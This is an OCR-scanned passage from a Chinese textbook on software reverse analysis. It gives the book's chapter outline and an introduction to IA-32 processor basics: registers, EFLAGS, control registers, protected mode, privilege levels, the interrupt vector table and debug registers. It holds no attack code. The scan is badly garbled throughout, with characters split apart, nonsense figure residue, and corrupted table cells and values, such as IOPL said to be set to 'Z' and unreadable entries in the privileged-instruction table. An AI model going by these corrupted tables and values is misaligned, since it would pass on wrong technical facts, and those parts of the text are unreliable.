作为 重点 ,但 考虑 到 内 容 的 完整 性 ,也 为 了 给 一 部 分 读者 铺垫 简单 的 基础 知识 ,将 在 第 2 
章 中 做 简要 介绍 。 至 于 加 过 代码 动态 生成 代码 等 特殊 代码 的 反 汇 编 ` 反 编译 问题 ,由 于 
目前 仍 未 形成 通用 的 解决 方法 ,相关 的 分 析 手 段 严 重 依赖 于 具体 的 加 这 或 动态 生成 算法 ， 
分 析 方 法 不 具有 通用 性 ,具体 算法 的 分 析 方 法 参考 价值 不 大 ,因此 在 本 书 中 也 未 做 专门 
介绍 。 


162 本 书 的 组 织 


本 书 分 为 3 部 分 , 共 11 章 。 其 中 ,第 1 一 3 章 为 基础 篇 ,主要 介绍 一 些 背 景 和 基础 知 
识 ,分 别 是 绪论 .基础 知识 .基础 工具 ;第 4 一 7 章 为 方法 篇 ,主要 介绍 软件 逆向 分 析 中 的 一 
些 基 础 方法 ,分 别 是 程序 切片 .符号 执行 .模糊 测试 和 污点 传播 分 析 ; 第 8 一 11 章 是 应 用 
篇 ,主要 介绍 软件 逆向 分 析 在 具体 工作 中 的 应 用 ,分 别 是 恶意 代码 检测 与 分 析 、 软 件 漏洞 
挖掘 与 分 析 、 网 络 协议 逆向 分 析 、 移 动 智能 终端 应 用 软件 安全 性 分 析 。 下 面 详细 介绍 各 章 
节 的 主要 内 容 。 

第 1 章 绪论 ,主要 介绍 软件 相关 的 主要 安全 问题 及 背景 ,简要 介绍 当前 软件 安全 分 
析 常 用 的 方法 和 技术 ,软件 安全 性 分 析 主 要 的 应 用 场景 ,并 介绍 本 书 的 主要 定位 和 组 织 
结构 。 

第 2 章 基础 知识 ,主要 介绍 软件 逆向 分 析 过 程 中 涉及 的 相关 基础 知识 ,包括 处 理 器 
硬件 架构 ,汇编 语言 知识 ,操作 系统 内 核 相关 基础 知识 等 。 

第 3 章 软件 安全 分 析 基 础 工具 ,主要 介绍 常见 的 分 析 工 具 , 主 要 包括 反 汇编 工 具 ， 
调试 工具 ,重点 介绍 工具 的 主要 用 途 .主要 功能 .技术 特点 等 方面 。 

第 4 章 程序 切片 ,主要 介绍 程序 切片 方法 ,包括 程序 切片 的 基本 原理 ,二 进 制程 序 
的 程序 切片 技术 ,以 及 典型 的 程序 切片 案例 。 

第 5 章 符号 执行 ,主要 介绍 符号 执行 方法 ,包括 符号 执行 的 基本 原理 ,国际 上 最 新 
的 符号 执行 工具 ,以 及 符号 执行 的 具体 应 用 案例 等 。 

第 6 章 模糊 测试 ,主要 介绍 模糊 测试 技术 ,包括 模糊 测试 的 基本 思想 ,典型 框架 , 代 
表 性 的 模糊 测试 工具 ,以 及 具体 的 实现 案例 。 
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第 7 章 污点 传播 分 析 , 主 要 介绍 污点 传播 分 析 方 法 ,包括 污点 传播 的 基本 原理 , 典 
型 实现 方案 ,代表 性 的 动态 污点 传播 工具 ,以 及 具体 的 动态 污点 传播 分 析 案 例 。 

第 8 章 恶意 代码 检测 与 分 析 , 主 要 介绍 恶意 代码 的 分 析 技术 ,包括 恶意 代码 分 析 的 
目标 ,涉及 的 技术 手段 ,恶意 代码 分 析 的 具体 案例 等 。 

第 9 章 软件 漏洞 挖掘 与 分 析 , 主 要 介绍 典型 的 软件 漏洞 分 析 过 程 和 软件 漏洞 利用 
方法 ,重点 介绍 如 何 利用 动态 逆向 分 析 技 术 解 析 软 件 漏洞 机 理 , 以 及 典型 软件 漏洞 的 利用 
代码 构造 方法 。 

第 10 章 ”网络 协 议 逆向 分 析 , 主 要 介绍 网 络 协议 的 逆向 分 析 技 术 , 包 括 网 络 协议 的 
基本 格式 解析 ,网 络 协议 状态 机 抽取 ,以 及 具体 的 网 络 协 议 逆向 分 析 案例 等 。 

第 11 章 移动 智能 终端 应 用 软件 安全 性 分 析 , 主 要 介绍 移动 智能 终端 应 用 软件 的 安 
全 分 析 技术 ,包括 移动 智能 终端 应 用 软件 的 实现 机 理 分 析 、 隐 私 窃取 行为 分 析 等 。 


1.7 其 他 说 明 


本 书 中 介绍 的 相关 方法 和 技术 对 提高 逆向 分 析 能 力 具 有 重要 作用 ,但 相关 理论 和 方 
法 不 仅 应 用 于 软件 逆向 分 析 中 ,有 些 理论 和 技术 在 源 代码 分 析 、 软 件 测试 等 工作 中 应 用 得 
也 非常 普遍 ,本 书 则 主要 从 软件 逆向 分 析 的 角度 介绍 相关 的 理论 和 技术 。 

由 于 Linux 平台 的 开源 特点 ,软件 逆向 分 析 当 前 关注 的 重点 仍 主要 是 面向 Windows 
系列 操作 系统 平台 展开 ,因此 ,在 未 做 特别 说 明 的 情况 下 ,本 书 中 介绍 的 实例 等 主要 是 围 
绕 Windows 操作 系统 平台 的 应 用 软件 逆向 分 析 展 开 的 。 但 相关 的 技术 和 方法 仍然 适用 
于 Linux 等 其 他 操作 系统 平台 。 
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基础 知识 


从 事 恶 意 代码 分 析 、 软 件 漏洞 分 析 的 工作 需要 掌握 计算 机 专业 方面 的 诸多 基础 知 
识 ,这 些 知 识 包 括 但 不 限于 硬件 基础 知识 ` 反 汇编 及 对 抗 技术 以 及 操作 系统 基础 。 本 
章 对 这 些 方面 的 基础 知识 进行 简要 介绍 ,要 更 加 深入 地 学 习 , 还 需要 参阅 其 他 相关 书 
籍 和 文献 。 


2.1 处 理 器 硬件 架构 基础 


硬件 是 软件 的 基础 资源 ,了 解 硬件 架构 对 于 深入 理解 操作 系统 原理 与 机 制 乃 至 软件 
漏洞 具有 一 定 的 指导 意义 。 本 节 主 要 介绍 处 理 器 的 硬件 架构 基础 ,以 Intel 的 CPU 为 例 ， 
从 存储 单元 及 各 存储 单元 的 设计 用 途 介 绍 处 理 器 的 基本 结构 ,另外 介绍 处 理 器 设计 的 一 
些 特性 ,包括 保护 模式 特权 级 、 中 断 和 异常 处 理 ,调试 支持 和 虚拟 化 支持 。 内 存 的 虚拟 化 
寻 址 方式 也 是 CPU 的 一 大 核心 内 容 , 这 一 部 分 安排 到 2. 3. 4 节 关 于 Windows 操作 系统 
的 内 存 管理 内 容 中 进行 介绍 。 


211 CPU 结构 介绍 
CPU 是 计算 机 中 央 处 理 器 的 简称 ,控制 着 计算 机 的 操作 和 执行 数据 处 理 功 能 ,如 


图 2-1 所 示 , 其 结构 包括 寄存 器 .算术 逮 辑 单元 
CALU) ,控制 器 和 内 部 总 线 。 寄 存 器 提供 CPU 控制 器 



































的 内 部 存储 ,用 来 暂时 存放 参与 运算 的 数据 及 运 TES = 
算 结果 ,不同 寄存 器 代表 了 不 同 的 物理 含义 ,应 用 B CPU B 
到 不 同 的 功能 场景 :算术 逻辑 单元 执行 计算 机 的 

运算 功能 ,包括 加 减 乘除 四 则 运算 ,左右 移 位 运 , 

XS xssuxe eumeasx (CUT C EES UU 
机 各 部 件 工作 ,包括 取 指 . 译 码 、 执 行 ;内 部 总 线 将 图 2-1 CPU 的 结构 
寄存 器 、ALU 以 及 控制 器 进行 互 连 , 提 供 通信 

机 制 。 


CPU 的 4 部 分 组 成 当中 ,寄存 器 记录 了 操作 系统 关键 数据 结构 的 入 口 ,这 些 信 息 是 
软件 漏洞 与 恶意 代码 分 析 的 基础 信息 ,因此 本 书 重点 关注 CPU 结构 中 的 寄存 器 结构 。 
CPU 发 展 至 今 , 字 长 从 开始 的 16 位 发 展 到 32 位 、64 位 ,本 书 以 32 位 字 长 的 IA-32 架构 
为 代表 进行 介绍 。IA-32 的 CPU 寄存 器 包括 指令 指针 寄存 器 ,通用 数据 寄存 器 、 地 址 指 
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针 寄 存 器 、 变 址 指针 寄存 器 ,标志 位 寄存 器 、 段 寄存 器 、 控 制 寄存 器 等 。 

EIP 寄存 器 是 指令 指针 寄存 器 ,存储 了 当前 执行 指令 的 地 址 ,系统 根据 该 寄存 器 进行 
寻 址 ,从 内 存 中 取出 指令 ,然后 再 译 码 .执行 。 

通用 数据 寄存 器 包括 EAX、ECX、EDX、EBX, 通 常用 于 存储 参与 运算 的 数据 及 运算 
结果 。 例 如 ,其 中 的 ECX 常 被 用 于 存储 循环 处 理 指令 的 循环 次 数 ,EAX 和 EDX 常 作为 
乘除 法 指令 的 隐 含 操作 数 。 通 用 数据 寄存 器 的 16 位 寄存 器 表示 为 AX、CX、DX、BX,8 位 
寄存 器 表示 为 AL、CL、DL、BL。 另 外 ,第 9—16 位 的 寄存 器 表示 为 AH、.CH、DH、BH,, 但 
没有 专门 用 于 表示 第 17 一 32 位 寄存 器 的 符号 。 在 x86-64 架构 下 ,其 64 位 寄存 器 表示 为 
RAX、RCX、RDX、RBX。 

地 址 指针 寄存 器 包括 ESP AI EBP, ESP 记录 了 当前 的 栈 顶 , call, ret, push, pop, 
pusha, popa 等 指令 会 改变 ESP 寄存 器 的 值 ,EBP 通常 记录 的 是 当前 函数 的 栈 底 。 变 址 
指针 寄存 器 包括 ESI 和 EDI, 通 常 ESI 是 操作 数 源 地 址 ,EDI 是 操作 数目 的 地 址 ,这 两 个 
操作 数 常 作为 隐 含 操作 数 ,指令 执行 完 后 自动 递增 实现 变 址 。 例 如 ,rep movsd 指令 受 
ECX 计数 器 控制 ,在 ECX 不 为 0 的 情况 下 将 ESI 指向 的 内 存 数据 复制 到 EDI 指向 的 内 
存 , 然 后 ECX 自动 减 1; EDI 和 ESI 根据 DF 标记 位 自动 增加 或 减少 4; 类 似 指 令 还 有 
loadsd,stosd,scasd 等 。 

标志 位 寄存 器 统称 为 EFLAGS, 图 2-2 列 出 了 EFLAGS 包含 的 标志 位 。 
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图 2-2 EFLAGS 标志 寄存 器 


CF; 进位 标志 ,用 于 表示 无 符号 数 运算 是 否 产 生 进 位 或 者 借 位 ,如 果 产 生 了 进位 
或 借 位 则 值 为 1, 否则 值 为 0。 

PF. 奇偶 标志 ,用 于 表示 运算 结果 中 1 的 个 数 的 奇偶 性 ,偶数 个 1 时 值 为 1, 奇数 
个 1 时 值 为 0。 

AF: 辅助 进位 标志 ,在 字 操 作 时 标记 低 字 节 是 否 向 高 字 节 进位 或 借 位 ,在 字 节 操 
作 时 标记 低 4 位 是 否 向 高 4 位 进位 或 借 位 。 

ZF: 零 标 志 , 用 于 表示 运算 结果 是 否 为 0, 结果 为 0 时 其 值 置 1, 否 则 和 置 0。 

SF: 符号 标志 ,用 来 标记 有 符号 数 运算 结果 是 否 小 于 0, 小 于 0 时 置 1, 和 否则 置 0。 
TF. 跟踪 标志 ,用 于 程序 调试 . 置 1 时 CPU 处 于 单 步 执行 状态 , 置 0 时 处 于 连续 
工作 状态 。 

IF; 中 断 允 许 标志 ,决定 CPU 是 否 响应 CPU 外 部 的 可 屏蔽 中 断 发 出 的 中 断 请 
求 , 置 1 时 可 以 响应 中 断 , 置 0 时 不 响应 中 断 。 

DF; 方向 标志 ,决定 串 操 作 指 令 执行 时 指针 寄存 器 的 调整 方向 。 

OF: 溢出 标志 ,用 于 表示 有 符号 运算 结果 是 否 溢出 ,发 生 溢 出 时 置 1 ,否则 置 0。 
IOPL: 1/0 特权 标志 ,用 于 表示 当前 进程 的 1/O 特权 级 别 , 只 有 当前 进程 的 CPL 
小 于 或 等 于 IOPL 时 才能 访问 1/0 地 址 空间 ,只 有 CPL 为 0 时 才能 修改 


Sem HIA 


IOPL 域 。 

NT; 典 套 任务 标志 , 置 1 表明 当前 任务 是 在 另 一 个 任务 中 租 套 执行 , 置 0 表明 非 
RE. 

RF: 恢复 标志 ,用 于 表示 是 否 响应 指令 断 点 , 置 1 禁用 指令 断 点 , 置 0 允许 指令 
断 点 。 

VM: 虚拟 8086 模式 标志 ,用 于 表示 进程 是 运行 在 虚拟 8086 模式 还 是 保护 模式 ， 
置 1 运行 在 虚拟 8086 模式 , 置 0 运行 在 保护 模式 。 

AC; 对 齐 检 测 标志 ,与 CRO 寄存 器 的 AM 标志 联合 使 用 ,这 两 个 标志 位 同时 置 1 
启用 对 内 存 引 用 的 对 齐 检查 ,同时 置 0 表示 禁用 对 齐 检查 。 对 齐 检查 仅 在 用 户 态 
(3 特权 级 ) 下 进行 ,0 特权 级 下 不 做 检查 。 

VIF: 虚拟 中 断 标 志 , 是 IF 标志 的 一 个 虚拟 映像 ,与 VIP 标志 一 起 使 用 , 当 控制 寄 
存 器 CR4 中 的 VME 或 者 PVI 标 志 位 置 1 H. IOPL 小 于 3 时 ,处 理 器 只 识别 VIF 
标志 。 

VIP; 虚拟 中 断 等 待 标志 , 置 1 表示 有 一 个 等 待 处 理 的 中 断 , 置 0 表示 没有 等 待 处 
理 的 中 断 。 

* ID: 识别 标志 , 置 1 表示 支持 CPUID 指令 , 置 0 表示 不 支持 。 

段 寄 存 器 包括 代码 段 寄 存 器 CS ,数据 段 寄 存 器 DS, 堆 栈 段 寄存 器 SS, 附 加 段 寄存 器 
ES、FS.GS。 实 模式 下 段 寄存 器 通常 与 指针 寄存 器 如 ESP, EDI, ESI 等 联合 使 用 ,保护 模 
式 下 需要 与 描述 符 表 结 合 。 

控制 寄存 器 包括 CRO,CRI ,CR2, CR3,CRAÀ 这 5 个 ,用 于 记录 处 理 器 的 运行 模式 和 
当前 执行 任务 的 属性 ,如 图 2-3 所 示 。 
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图 2-3 控制 寄存 器 


* CRO 记录 了 系统 控制 标志 ,这 些 标志 控制 处 理 器 的 运行 模式 和 状态 。PE 是 保护 
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模式 标志 , 置 1 启用 保护 模式 , 置 0 启用 实地 址 模式 ;PG 是 分 页 标志 , 置 1 启动 分 
页 (前 提 是 PE 标志 位 已 置 1 开启 包含 模式 ) , 置 0 禁用 分 页 ;其 他 标志 位 的 功能 可 
参考 Intel 手册 ,限于 篇 幅 本 书 无 法 逐一 介绍 。 

CRI 是 保留 的 控制 寄存 器 ,用 于 将 来 的 扩展 。 

CR2 记录 了 引起 页 故障 的 线性 地 址 。 

CR3 是 页 表 寄 存 器 ,存储 了 20 位 的 页 目录 表 的 基地 址 和 两 个 标志 位 PCD、PWT。 
20 位 的 页 目录 基地 址 是 页 目录 表 物 理 地 址 的 高 20 位 , 低 12 位 是 0, 因 此 页 目录 
表 的 地 址 必须 是 页 边界 对 齐 (4KB) 。 

CR4 包含 一 组 标志 ,用 于 决定 是 否 启用 IA-32 架构 上 的 几 个 扩展 。VME 为 虚拟 
8086 模式 扩展 , 置 1 表示 在 虚拟 8086 模式 下 启用 中 断 和 蜡 常 处 理 扩展 , 置 0 则 关 
闭 ;PVI 为 保护 模式 虚拟 中 断 , 置 1 表示 开启 保护 模式 下 的 虚拟 中 断 标 志 VIF 的 
硬件 支持 , 置 0 则 禁用 保护 模式 下 的 VIF 标志 ;DE 为 调试 扩展 , 置 1 则 引用 调试 
器 寄存 器 DR4 和 DR5 引发 一 个 未 定义 操作 码 的 异常 , 置 0 时 处 理 器 与 别名 应 用 
DR4 和 DR5;PSE 为 页 尺寸 扩展 , 置 1 时 页 大 小 为 4MB, 置 0 时 页 大 小 为 4KB; 
PAE 为 物理 地 址 扩展 标志 , 置 1 启用 36 位 物理 地 址 分 页 机 制 , 置 0 只 可 引用 
32 位 地 址 。MCE 为 机 器 检测 控制 位 , 置 1 时 启用 机 器 检测 异常 , 置 0 时 则 禁用 机 
器 检测 异常 ;PGE 为 全 局 页 启用 控制 位 ,在 P6 系列 处 理 器 中 引入 , 置 1 启用 全 局 
页 , 置 0 则 禁用 全 局 页 ,有 关 全 局 页 的 特性 详 见 Intel 手册 第 三 卷 ;PCE 是 性 能 监 
测 计数 器 控制 位 , 置 1 允许 任何 特权 级 程序 执行 RDPMC 指令 , 置 0 只 允许 Ring 
0 特权 级 程序 执行 RDPMC 指令 ; OSFXSR 是 操作 系统 对 FXSAVE 和 
FXRSTOR 指令 支持 的 控制 位 , 置 1 表示 操作 系统 支持 FXSAVE 和 FXRSTOR 
指令 , 置 0 则 不 支持 ,执行 该 指令 将 触发 非法 操作 码 异常 ;OSXMMEXCPT 是 支 
TF SIMD 浮 点 异常 处 理 的 控制 位 , 置 1 开启 SIMD 浮 点 异常 的 处 理 支持 , 置 0 则 
不 支持 。 


212 保护 模式 


IA-32 架构 的 CPU 具有 两 种 工作 模式 : 实 模式 和 保护 模式 ,工作 模式 受到 CRO 控制 
寄存 器 的 PE 标志 位 控制 。CPU 刚 开 始 初始 化 后 工作 在 实 模式 下 ,PE 标志 位 值 为 0, 仅 
使 用 20 位 地 址 , 寻 址 空间 为 1MB; 当 操作 系统 启动 时 ,将 CPU 的 PE 标志 位 置 1, 开 启 保 








护 模式 ,使 





日 32 位 地 址 ,内 存 寻 址 空间 扩展 到 4GB。 另 外 , 实 模式 不 支持 多 线程 ,不 能 实 





现 权限 分 级 ;保护 模式 下 引入 内 存 的 分 页 和 分 段 管 理 机 制 ,实现 了 内 存 分 页 和 权限 分 级 ， 
并 支持 多 线程 多 任务 。 

分 页 由 CR3 寄存 器 支持 ,分 段 由 内 存 管理 寄存 器 (包括 GDTR、IDTR、LDTR 和 TR 
这 4 个 寄存 器 ) 支 持 ,用 于 定位 控制 分 段 内 存 管 理 的 数据 结构 所 在 的 位 置 ,如 图 2-4 ron o 


。 GDTR 是 全 局 描述 符 表 寄 存 器 ,保存 了 GDT 全 局 描述 符 表 的 32 位 基地 址 和 
16 位 表 限 长 。 基 地 址 是 指 GDT 的 第 一 个 字 节 在 内 存 中 的 线性 地 址 , 表 限 长 是 指 
表 中 的 字 节 个 数 。CPU 初始 化 时 基地 址 设置 为 0, 表 限 长 设置 为 0xffff, 通 过 
LGDT 指令 重新 装载 设置 GDTR 寄存 器 ,通过 SGDT 保存 GDTR 寄存 器 。 
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GDTR 32 位 线性 基地 址 16 位 表 限 长 
IDTR 32 位 线性 基地 址 16 位 表 限 长 
63 48 47 16 15 0 
LDTR | 16 位 段 选择 子 32 位 线性 基地 址 16 位 段 限 长 
TR 16 位 段 选择 子 32 位 线性 基地 址 16 位 段 限 长 




















图 2-4 内存 管理 寄存 器 


IDTR 是 中 断 描述 符 表 寄存 器 ,保存 了 IDT 中 断 描述 符 表 的 32 位 基地 址 和 16 位 
表 限 长 。 基 地 址 是 指 IDT 的 第 一 个 字 节 在 内 存 中 的 线性 地 址 , 表 限 长 是 指 表 中 
的 字 节 个 数 。CPU 初始 化 时 基地 址 设置 为 0, 表 限 长 设置 为 0xffff, 通 过 LIDT 指 
令 重新 装载 设置 IDTR 寄存 器 ,通过 SIDT 保存 IDTR 寄存 器 。 

LDTR 是 局 部 描述 符 表 寄存 器 ,保存 了 LDT 局 部 描述 符 表 的 16 位 段 选择 子 、 
32 位 基地 址 16 位 段 限 长 和 LDT 属性 。 段 选择 子 指向 了 定义 段 的 段 描述 符 , 基 
地 址 是 指 LDT 的 第 一 个 字 节 在 内 存 中 的 线性 地 址 , 段 限 长 是 指 表 中 的 字 节 个 数 。 
CPU 初始 化 时 基地 址 设置 为 0, 段 限 长 设置 为 0xffff, 通 过 LLDT 指令 重新 装载 
设置 LDTR 寄存 器 的 段 选择 子 部 分 ,通过 SLDT 保存 LDTR 寄存 器 的 段 选 择 子 
部 分 。LDT 所 在 的 段 必须 在 GDT 中 有 一 个 段 描 述 符 , 当 LLDT 指令 装载 一 个 段 
选择 子 到 LDTR 中 时 ,LDT 描述 符 的 基地 址 、 段 限 长 和 描述 符 属性 自动 装载 到 
LDTR 中 。 

TR 是 任务 寄存 器 ,保存 了 16 位 的 段 选择 子 、16 位 段 限 长 和 当前 任务 的 TSS 属 
性 , 它 引 用 了 GDT 中 的 TSS 描述 符 。 段 选择 子 指向 了 定义 段 的 段 描 述 符 ,基地 
址 是 指 TSS 的 第 一 个 字 节 在 内 存 中 的 线性 地 址 , 段 限 长 是 指 TSS 表 的 字 节 个 数 。 
CPU 初始 化 时 基地 址 设置 为 0, 表 限 长 设置 为 0xffff, 通 过 LTR 指令 重新 装载 设 
置 TR 寄存 器 段 选择 子 部 分 ,通过 STR 保存 TR 寄存 器 段 选 择 子 部 分 。TR 引用 
GDT 中 的 TSS 描述 符 , 当 LTR 装载 一 个 段 选择 子 到 任务 寄存 器 时 ,从 相关 TSS 
描述 符 中 取出 的 基地 址 、 段 限 长 和 描述 符 属性 会 被 自动 装载 到 TR 任务 寄存 器 。 


213 特权 级 


CPU 支持 Ring0、Ringl、Ring2、Ring3 JE 4 个 权限 级 别 ,Ring0 权限 最 高 ,Ring3 权限 
最 低 , Windows 操作 系统 只 使 用 了 Ring0 和 Ring3 两 个 级 别 。 其 中 ,Ring0 级 可 以 访问 
Ring0 和 Ring3 级 的 资源 ,Ring3 级 无 法 访问 Ring0 级 的 资源 ,只 能 访问 Ring3 级 的 资源 。 
而 为 了 进行 代码 段 和 数据 段 间 的 特权 级 检验 ,需要 3 种 类 型 的 特权 级 支持 : 当前 特权 级 、 
描述 符 特权 级 ,请 求 特权 级 。 

。 当前 特权 级 (CPL) 是 当前 执行 线程 的 特权 级 ,存储 在 CS 段 寄存 器 和 SS 段 寄存 器 
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的 第 0 位 和 第 1 位 中 ,通常 情况 下 CPL 与 当前 指令 所 在 代码 段 的 特权 级 相等 。 
当 进 程 的 控制 流转 到 一 个 不 同 特权 级 的 代码 段 时 ,处 理 器 需要 改变 CPL, 如 
Ring3 情况 下 通过 int 指令 进入 Ring0, 或 者 Ringo 状态 下 通过 iret 指令 回 到 
Ring3 状态 。 
描述 符 特权 级 (DPL) 是 段 或 门 的 特权 级 ,存储 在 段 或 门 的 描述 符 的 DPL 域 中 。 
当 执 行 的 代码 段 尝试 访问 一 个 段 或 门 时 ,人 处理 器 将 段 或 门 的 DPL 与 CPL 以 及 段 
或 门 的 选择 子 中 的 RPL 进行 比较 以 判定 是 否 具有 访问 权限 。 例 如 数据 段 ,DPL 
指示 访问 该 数据 段 的 线程 或 任务 的 CPL 特权 级 可 以 具备 的 最 大 数值 ,如 DPL 是 
1, 只 有 CPL 为 0 或 1 的 线程 才能 访问 它 ;再 如 调用 门 ,DPL 指示 访问 该 调用 门 的 
进程 或 任务 的 CPL 特权 级 可 以 具备 的 最 大 数值 。 
请 求 特 权 级 (RPL) 是 赋 给 段 选择 子 的 取代 性 特权 级 ,存储 在 段 选择 子 的 第 0、1 
位 ,处 理 器 同时 检查 RPL 和 CPL 的 特权 级 是 否 都 有 足够 的 访问 特权 级 , 取 其 最 
低 特权 级 与 DPL 进行 比较 ,只 有 RPL 和 CPL 的 特权 级 都 不 低 于 DPL 时 访问 才 





能 成 功 。 
另外 ,CPU 有 一 部 分 指令 属于 特权 指令 ,这 部 分 指令 只 能 运行 "e Ring0 特权 级 , 普 i 
应 用 程序 无 法 执行 这 些 指令 ,需要 在 操作 系统 内 核 态 下 才能 执行 这 些 指 令 。 这 类 常见 的 


指令 如 表 2-1 所 示 。 
R21 常用 特权 级 指令 


























指 e 指令 说 明 对 用 户 态 是 否 有 用 | 是 否 禁止 用 户 态 使 用 
LLDT 装载 LDT 寄存 器 否 是 
LGDT 装载 GDT 寄存 器 F Æ 
LTR 装载 TR 寄存 器 F 是 
LIDT 装载 IDT 寄存 器 否 是 
MOV CRn 装载 和 保存 控制 寄存 器 8 是 
LMSW 装载 MSW 8 是 
CLTS 清空 CRO 中 的 TS 标志 E 是 
MOV DBn 装载 和 保存 调试 控制 器 8 是 














特别 注意 ,中 断 指令 CLI 和 STI 由 操作 系统 和 内 核 统一 管理 ,但 它们 并 非特 权 指 
只 要 满足 CPL 不 大 于 IOPL 即 可 执行 CLI 和 STI 但 由 于 操作 系统 通常 将 ZOPL 设置 
成 Z, 因 此 CLUSTI 也 像 特权 指令 一 样 只 能 被 内 核 代 码 执行 。 


214 中 断 处 理 与 异常 处 理 


中 断 和 异常 是 程序 执行 过 程 中 的 插曲 ,需要 处 理 器 强制 暂停 当前 任务 ,转移 到 一 个 称 
为 中 断 处 理 程序 或 者 异常 处 理 程序 的 特殊 任务 中 。 处 理 器 响应 中 断 或 者 异常 所 采取 的 行 
动 称 为 服务 或 者 处 理 中 断 和 异常 。 中 断 是 在 程序 执行 期 间 随机 发 生 的 ,可 以 是 对 硬件 信 
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号 的 响应 ,如 鼠标 、 键 盘 ; 也 可 以 是 软件 中 断 , 如 INT n 指令。 异常 是 在 处 理 器 执行 指令 
过 程 中 发 生 错 误 情况 时 产生 的 ,如 除 0 错误 ,保护 违例 、 页 故障 、 内 部 机 器 故障 。 

IA-32 架构 的 中 断 处 理 机 制 是 收 到 中 断 信号 或 者 检测 到 异常 时 ,处 理 器 挂 起 当前 运 
行 的 进程 或 任务 ,保存 好 任务 现场 后 转 而 去 执行 中 断 或 者 异常 处 理 程序 ,处 理 完 后 恢复 现 
场 , 继 续 执 行 被 中 断 的 进程 或 任务 。 

IA-32 架构 为 每 一 个 异常 和 需要 处 理 的 中 断 分 配 了 一 个 唯一 识别 码 , 称 为 中 断 向 量 。 
处 理 器 以 中 断 向 量 为 索引 ,定位 访问 中 断 描述 符 表 (IDT) ,索引 号 的 范围 是 0 一 255, 其 中 
0 一 31 被 1A-32 架构 保留 给 架构 定义 的 异常 和 中 断 ,32 一 255 之 间 的 中 断 向 量 号 由 操作 系 
统 定义 的 中 断 使 用 ,如 表 2-2 所 示 。 

表 2-2 IA-32 架构 下 的 保护 模式 异常 和 中 断 向 量 



















































































向 量 号 | 助 记 符 描 g 类 型 | 错误 码 源 
0 #DE | 除法 错 故障 | 无 DIV 和 IDIV 指令 
1 *DB | 保留 故障 | 无 只 由 Intel 使 用 
2 无 NMI 中 断 中 断 | 无 不 可 屏蔽 外 部 中 断 
3 *BP | 断 点 陷阱 | 无 INT 3 指令 
4 #OF | 溢出 陷阱 | 无 INTO 指令 
5 #BR | BOUND 范围 越界 “| 故障 | 无 BOUND 指令 
6 *UD | 非法 操作 码 故障 | 无 UD2 指令 或 者 保留 的 操作 码 
7 *NM | 设备 不 可 用 故障 | 无 浮 点 或 者 WAIT/FWAIT 指令 
8 #DF | 双 故 障 终止 | 有 (0) | 任意 一 个 产生 异常 NMIINTR 的 指令 
9 无 协 处 理 器 段 超出 故障 | 无 浮 点 指令 
10 #TS | 非法 TSS 故障 | 有 切换 任务 或 TSS 访问 
11 #NP | 段 不 存在 故障 | 有 加 载 段 寄 存 器 或 者 访问 系统 段 
12 #SS | 栈 段 故 障 故障 | 有 栈 操作 或 SS 寄存 器 加 载 
13 #GP | 一 般 保护 故障 | 有 内 存 引用 或 其 他 保护 检验 
14 #PF | 页 故障 故障 | 有 任何 内 存 引用 
15 无 Intel 保留 故障 | 无 
16 *MF | x87 FPU 浮 点 错误 | 故障 | 无 x87 FPU 浮 点 或 者 WAIT 指令 
17 SAC | 对 齐 检验 故障 | 有 (0) | 任何 内 存 中 的 数据 引用 
18 #MC | 机 器 检验 终止 | 无 错误 码 和 源 是 模型 相关 的 
19 #XF | SIMD 符号 异常 故障 | 无 SSE/SSE2/SSE3 浮 点 指令 
20~31 | 无 Intel 保留 
32~255 | 无 用 户 定义 中 断 中 断 外 部 中 断 或 者 INT 指令 





引起 中 断 产生 的 原因 或 来 源 称 为 中 断 源 ,包括 硬件 中 断 和 软件 中 断 。 硬 件 中 断 属于 
外 部 中 断 ,通过 处 理 器 引 脚 或 者 本 地 APIC 接收 ,通过 INTR 引 脚 或 者 本 地 APIC 传递 到 
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处 理 器 的 外 部 中 断 是 可 屏蔽 的 硬件 中 断 ,通过 控制 EFLAGS 寄存 器 的 IF 标志 位 可 以 屏 
项 全 部 的 可 屏蔽 硬件 中 断 。 另 外 ,将 中 断 向 量 号 作为 INT. 指令 的 操作 数 即 可 通过 INT 
指令 在 软件 中 产生 中 断 , 例 如 ,指令 INT 3 即 可 强制 调用 第 3 号 中 断 处 理 例 程 。 

引起 异常 产生 的 原因 或 来 源 称 为 异常 源 ,包括 处 理 器 检测 到 程序 错误 异常 .软件 产生 
的 异常 和 机 器 检测 异常 3 种 情况 。 程 序 或 操作 系统 运行 过 程 中 ,探测 到 程序 错误 ,处 理 器 
产生 一 个 或 多 个 异常 。IA-32 架构 为 每 个 异常 定义 一 个 向 量 号 ,这 类 异常 可 分 为 故障 、 陷 
阱 终止。 软件 产生 的 异常 是 程序 指令 主动 产生 异常 ,如 INTO INT 3,BOUND 指令 允 
许 在 软件 中 产生 异常 ,这 些 指令 在 程序 中 的 指定 点 检测 指定 的 异常 条 件 , 例 如 INT 3 产 
生 一 个 断 点 异常 。 机 器 检测 异常 提供 内 部 和 外 部 的 机 器 检测 机 制 , 用 来 检测 内 部 芯片 硬 
件 和 总 线 事务 的 操作 ,构成 扩展 的 异常 机 制 , 当 探测 到 错误 时 处 理 器 发 出 机 器 检测 异常 
(18 号 向 量 ) 信 号 ,返回 错误 码 。 


215 调试 支持 


程序 调试 是 软件 开发 过 程 中 进行 排 错 和 查 错 的 过 程 ,需要 CPU 架构 的 支持 。IA-32 
架构 的 CPU 中 ,标志 位 寄存 器 EFLAGS 中 的 IF、TF 标志 用 于 调试 模式 的 开启 ,将 TF 位 
置 1 使 CPU 处 于 单 步 执行 状态 ,也 即 调试 状态 ,同时 需要 将 IF 位 置 1, 开 启 CPU 的 中 断 
响应 。 

另外 ,CPU 设计 了 DRO~DR7 JE 8 个 调试 寄存 器 .用 于 断 点 设置 功能 ,如 图 2-5 所 示 。 
DR0 一 DR3 3X 4 个 寄存 器 是 断 点 地 址 寄存 器 ,用 于 保存 断 点 地 址 ;DR4 和 DR5 保留 未 使 用 ， 





































































































作为 DR6 和 DR? 的 别名 寄存 器 ;DR6 是 调试 状态 寄存 器 ;DR7 是 调试 控制 寄存 器 。 
313029282726252423222120191817161514131211109 876 543210 
£I2IZ EIE |g|E|8loos ooi gus 
DR7 SIE SIEISIEISIZ © gaoj- o-o- 
DR6 保留 位 ( 置 1) EE 1111111 Adas 
DR5 保留 
DR4 保留 
DR3 断 点 3 线性 地 址 
DR2 断 点 2 线性 地 址 
DRI 断 点 1 线性 地 址 
DR0 断 点 0 线性 地 址 











图 2-5 IA-32 架构 调试 寄存 器 
